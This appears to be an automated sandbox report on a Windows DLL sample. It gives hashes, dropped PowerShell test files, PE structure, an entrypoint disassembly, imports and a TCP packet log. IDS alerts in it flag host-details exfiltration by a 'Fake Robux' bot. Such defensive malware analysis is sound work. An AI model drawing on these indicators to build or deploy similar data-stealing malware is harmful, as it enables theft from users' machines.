                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibs5xqtr.24g.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnztuxdb.5qk.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzqskzdd.ss5.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ob5my5yy.32f.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t2ekwh3i.4s4.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_td4p0bwx.ua1.ps1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wlmmxsir.tuq.psm1

                                                                Download File
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                Static File Info

                                                                General

                                                                File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Entropy (8bit):5.96940685690436
                                                                TrID:
                                                                • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                • Win64 Executable (generic) (12005/4) 10.17%
                                                                • Generic Win/DOS Executable (2004/3) 1.70%
                                                                • DOS Executable Generic (2002/1) 1.70%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                File name:5UIy3bo46y.dll
                                                                File size:112'128 bytes
                                                                MD5:674fb5fd30f3b299608e7d439f1bd3e7
                                                                SHA1:b3dabd98de642f0611b7d10f9602375f31b28f1b
                                                                SHA256:0b9acce9a60dda0df4fdc61eb954433a5bff023ab04e38aca2c2f18aad70c3f3
                                                                SHA512:4b3660d4f2573fca80d9a1ae03a9f9e6f2fff442129883d4bf940b9a2c7989b0c41f34b89aacf0ec7f1360c1b2883999cfa2570221c14928c3065085f5d3b4c3
                                                                SSDEEP:3072:UtJPYfAUwG1bIaNgByg1jCgH4F1WsBeMflwl:EYfAtG1bIaOQsm24bWOwl
                                                                TLSH:17B35A4B62A504FBF1368378C8A34E45E7B6B8150760AF6F07A4435A1F63BD18D3EB61
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'LY.c-7.c-7.c-7.(U4.f-7.(U2..-7.(U3.i-7.c-7.b-7...2.F-7...3.m-7...4.r-7.(U6.`-7.c-6.9-7...>.a-7...7.b-7.....b-7...5.b-7.Richc-7

                                                                File Icon

                                                                Icon Hash:7ae282899bbab082

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x1800013fc
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x180000000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0x66BA1D6A [Mon Aug 12 14:34:18 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:0
                                                                File Version Major:6
                                                                File Version Minor:0
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:0
                                                                Import Hash:3b33a0fd02e658d9e1cdca7d0fcc3364

                                                                Entrypoint Preview

                                                                Instruction
                                                                dec eax
                                                                mov dword ptr [esp+08h], ebx
                                                                dec eax
                                                                mov dword ptr [esp+10h], esi
                                                                push edi
                                                                dec eax
                                                                sub esp, 20h
                                                                dec ecx
                                                                mov edi, eax
                                                                mov ebx, edx
                                                                dec eax
                                                                mov esi, ecx
                                                                cmp edx, 01h
                                                                jne 00007F5A2C876D97h
                                                                call 00007F5A2C877094h
                                                                dec esp
                                                                mov eax, edi
                                                                mov edx, ebx
                                                                dec eax
                                                                mov ecx, esi
                                                                dec eax
                                                                mov ebx, dword ptr [esp+30h]
                                                                dec eax
                                                                mov esi, dword ptr [esp+38h]
                                                                dec eax
                                                                add esp, 20h
                                                                pop edi
                                                                jmp 00007F5A2C876C24h
                                                                int3
                                                                int3
                                                                int3
                                                                inc eax
                                                                push ebx
                                                                dec eax
                                                                sub esp, 20h
                                                                dec eax
                                                                mov ebx, ecx
                                                                xor ecx, ecx
                                                                call dword ptr [0000EBE3h]
                                                                dec eax
                                                                mov ecx, ebx
                                                                call dword ptr [0000EBD2h]
                                                                call dword ptr [0000EBDCh]
                                                                dec eax
                                                                mov ecx, eax
                                                                mov edx, C0000409h
                                                                dec eax
                                                                add esp, 20h
                                                                pop ebx
                                                                dec eax
                                                                jmp dword ptr [0000EBD0h]
                                                                dec eax
                                                                mov dword ptr [esp+08h], ecx
                                                                dec eax
                                                                sub esp, 38h
                                                                mov ecx, 00000017h
                                                                call dword ptr [0000EBC4h]
                                                                test eax, eax
                                                                je 00007F5A2C876D99h
                                                                mov ecx, 00000002h
                                                                int 29h
                                                                dec eax
                                                                lea ecx, dword ptr [0001970Ah]
                                                                call 00007F5A2C876F5Eh
                                                                dec eax
                                                                mov eax, dword ptr [esp+38h]
                                                                dec eax
                                                                mov dword ptr [000197F1h], eax
                                                                dec eax
                                                                lea eax, dword ptr [esp+38h]
                                                                dec eax
                                                                add eax, 08h
                                                                dec eax
                                                                mov dword ptr [00019781h], eax
                                                                dec eax
                                                                mov eax, dword ptr [000197DAh]
                                                                dec eax
                                                                mov dword ptr [0001964Bh], eax

                                                                Data Directories

                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x193700x58.rdata
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x193c80x28.rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1f0000xf8.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1c0000x1050.pdata
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x200000x664.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x17a500x70.rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x179100x140.rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x100000x250.rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                Sections

                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x10000xeb000xec009fe23eb43cbcad6cabdf9eafbecd6cc8False0.5630958686440678data6.484254393647746IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rdata0x100000x9b880x9c004a209a1ae41be4b05e33747182ca5f9bFalse0.4267077323717949data4.69922142453641IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .data0x1a0000x1ca80xc00af46192a71fd8a69989b5851533731e7False0.14225260416666666data2.0418830550419096IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                .pdata0x1c0000x10500x1200f0cce2aebb958d7285860ee3522105aaFalse0.4320746527777778data4.53353806453801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                _RDATA0x1e0000x1f40x2004ab83cc1ce28301b416d0dd0254e20a6False0.5234375data3.7086617662342007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .rsrc0x1f0000xf80x200ca220b4e602307c00e829209b4722123False0.3359375data2.5249599901333757IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x200000x6640x80037e12b9713770c777edb6bf775fef47aFalse0.4990234375data4.880231318845951IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_MANIFEST0x1f0600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793

                                                                Imports

                                                                DLLImport
                                                                KERNEL32.dllWinExec, WriteConsoleW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, InterlockedFlushSList, RtlPcToFileHeader, RaiseException, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle

                                                                Exports

                                                                NameOrdinalAddress
                                                                DllRegisterServer10x180001000

                                                                Possible Origin

                                                                Language of compilation systemCountry where language is spokenMap
                                                                EnglishUnited States

                                                                Network Behavior

                                                                Suricata IDS Alerts

                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-10-15T16:00:28.799240+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.752050162.159.128.233443TCP
                                                                2024-10-15T16:00:28.800110+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.752049162.159.128.233443TCP
                                                                2024-10-15T16:00:38.975597+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.752102162.159.128.233443TCP
                                                                2024-10-15T16:00:39.025748+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.752104162.159.128.233443TCP
                                                                2024-10-15T16:00:56.974316+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.752203162.159.128.233443TCP
                                                                2024-10-15T16:01:03.495587+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.752206162.159.128.233443TCP

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Oct 15, 2024 16:00:10.466571093 CEST4974380192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:10.467437983 CEST4974480192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:10.471452951 CEST8049743104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:10.472038984 CEST4974380192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:10.472265959 CEST8049744104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:10.472702980 CEST4974480192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:10.479126930 CEST4974480192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:10.481404066 CEST4974380192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:10.483892918 CEST8049744104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:10.486316919 CEST8049743104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:10.489725113 CEST4974580192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:10.494658947 CEST8049745104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:10.494725943 CEST4974580192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:10.496746063 CEST4974580192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:10.501631975 CEST8049745104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:10.507976055 CEST4974680192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:10.513079882 CEST8049746104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:10.513154030 CEST4974680192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:10.515091896 CEST4974680192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:10.520210981 CEST8049746104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:11.103497982 CEST8049744104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:11.103718042 CEST8049744104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:11.104132891 CEST4974480192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:11.113112926 CEST8049743104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:11.113164902 CEST8049743104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:11.113174915 CEST8049743104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:11.113220930 CEST4974380192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:11.122750998 CEST49752443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.122767925 CEST44349752104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.122798920 CEST49753443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.122812033 CEST44349753104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.122833967 CEST49752443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.122903109 CEST49753443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.131637096 CEST49752443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.131643057 CEST49753443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.131653070 CEST44349752104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.131659031 CEST44349753104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.132302999 CEST8049745104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:11.132322073 CEST8049745104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:11.132375956 CEST4974580192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:11.134619951 CEST49754443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.134633064 CEST44349754104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.134776115 CEST49754443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.137012005 CEST49754443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.137021065 CEST44349754104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.166562080 CEST8049746104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:11.166600943 CEST8049746104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:11.166610956 CEST8049746104.18.111.161192.168.2.7
                                                                Oct 15, 2024 16:00:11.166652918 CEST4974680192.168.2.7104.18.111.161
                                                                Oct 15, 2024 16:00:11.169277906 CEST49755443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.169331074 CEST44349755104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.169435978 CEST49755443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.171886921 CEST49755443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.171910048 CEST44349755104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.765945911 CEST44349754104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.766026974 CEST49754443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.766344070 CEST44349752104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.766407967 CEST49752443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.767178059 CEST44349753104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.767407894 CEST49753443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.769592047 CEST49754443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.769606113 CEST44349754104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.769670963 CEST49753443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.769675016 CEST44349753104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.769884109 CEST44349754104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.769903898 CEST44349753104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.770742893 CEST49752443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.770764112 CEST44349752104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.771174908 CEST44349752104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.776427984 CEST49753443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.778384924 CEST49754443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.782897949 CEST49752443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.796600103 CEST44349755104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.796678066 CEST49755443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.798358917 CEST49755443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.798382044 CEST44349755104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.798779964 CEST44349755104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.804780960 CEST49755443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:11.819401979 CEST44349754104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.819415092 CEST44349753104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.823414087 CEST44349752104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:11.847419977 CEST44349755104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:12.172533989 CEST44349754104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:12.172619104 CEST44349754104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:12.172743082 CEST44349752104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:12.172832012 CEST49754443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:12.172878981 CEST44349755104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:12.172907114 CEST44349752104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:12.172972918 CEST44349755104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:12.173017979 CEST49755443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:12.173017979 CEST49752443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:12.173660994 CEST44349753104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:12.173739910 CEST44349753104.20.3.235192.168.2.7
                                                                Oct 15, 2024 16:00:12.173815012 CEST49753443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:12.197412014 CEST49752443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:12.199444056 CEST49754443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:12.204463005 CEST49753443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:12.206171989 CEST49755443192.168.2.7104.20.3.235
                                                                Oct 15, 2024 16:00:12.240525961 CEST4975980192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.240643024 CEST4976080192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.240993023 CEST4976180192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.241271973 CEST4976280192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.245584011 CEST8049759185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.245615959 CEST8049760185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.245688915 CEST4975980192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.245688915 CEST4976080192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.245913982 CEST4976080192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.246007919 CEST8049761185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.246061087 CEST4976180192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.246109962 CEST4975980192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.246118069 CEST8049762185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.246179104 CEST4976280192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.246268034 CEST4976180192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.246316910 CEST4976280192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.250935078 CEST8049760185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.251092911 CEST8049759185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.251125097 CEST8049761185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.251224041 CEST8049762185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.861293077 CEST8049762185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.861511946 CEST4976280192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.863491058 CEST49768443192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.863547087 CEST44349768185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.863610983 CEST49768443192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.863755941 CEST8049762185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.863805056 CEST4976280192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.864166021 CEST49768443192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.864183903 CEST44349768185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.865664005 CEST8049760185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.865981102 CEST4976080192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.866390944 CEST8049762185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.866889000 CEST49769443192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.866936922 CEST44349769185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.867008924 CEST49769443192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.867254972 CEST49769443192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.867269993 CEST44349769185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.868571043 CEST8049760185.199.109.133192.168.2.7
                                                                Oct 15, 2024 16:00:12.868652105 CEST4976080192.168.2.7185.199.109.133
                                                                Oct 15, 2024 16:00:12.870908022 CEST8049760185.199.109.133192.168.2.7
